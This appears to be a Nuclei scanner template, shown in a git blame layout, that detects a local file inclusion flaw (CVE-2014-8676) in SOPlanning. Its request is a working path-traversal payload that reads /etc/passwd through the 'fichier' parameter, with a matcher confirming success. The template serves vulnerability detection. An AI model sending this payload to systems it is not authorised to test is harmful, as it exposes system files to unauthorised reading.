2022-09-04 10:15:58 +00:00
|
|
|
id: CVE-2014-8676
|
2022-09-04 11:11:54 +00:00
|
|
|
|
2022-09-04 10:15:58 +00:00
|
|
|
info:
|
2022-09-16 19:50:10 +00:00
|
|
|
name: Simple Online Planning Tool <1.3.2 - Local File Inclusion
|
2022-09-04 10:15:58 +00:00
|
|
|
author: 0x_Akoko
|
2022-09-16 20:03:07 +00:00
|
|
|
severity: medium
|
2022-09-04 11:11:54 +00:00
|
|
|
description: |
|
2022-09-16 19:50:10 +00:00
|
|
|
SOPlanning <1.32 contain a directory traversal in the file_get_contents function via a .. (dot dot) in the fichier parameter.
|
2022-09-04 10:15:58 +00:00
|
|
|
reference:
|
|
|
|
- https://packetstormsecurity.com/files/132654/Simple-Online-Planning-Tool-1.3.2-XSS-SQL-Injection-Traversal.html
|
2022-09-05 11:40:53 +00:00
|
|
|
- https://www.exploit-db.com/exploits/37604/
|
|
|
|
- http://seclists.org/fulldisclosure/2015/Jul/44
|
2022-09-16 19:50:10 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2014-8676
|
2023-07-11 19:49:27 +00:00
|
|
|
- http://packetstormsecurity.com/files/132654/Simple-Online-Planning-Tool-1.3.2-XSS-SQL-Injection-Traversal.html
|
2022-09-04 10:15:58 +00:00
|
|
|
classification:
|
2022-09-16 20:03:07 +00:00
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
|
|
cvss-score: 5.3
|
2022-09-16 19:50:10 +00:00
|
|
|
cve-id: CVE-2014-8676
|
2022-09-16 20:03:07 +00:00
|
|
|
cwe-id: CWE-22
|
2023-07-11 19:49:27 +00:00
|
|
|
epss-score: 0.00195
|
|
|
|
cpe: cpe:2.3:a:soplanning:soplanning:*:*:*:*:*:*:*:*
|
2023-08-31 11:46:18 +00:00
|
|
|
epss-percentile: 0.56565
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: soplanning
|
|
|
|
product: soplanning
|
|
|
|
tags: packetstorm,edb,seclists,cve,cve2014,soplanning,lfi
|
2022-09-04 10:15:58 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-09-04 10:15:58 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/process/feries.php?fichier=../../../../../../../etc/passwd"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "root:[x*]:0:0"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|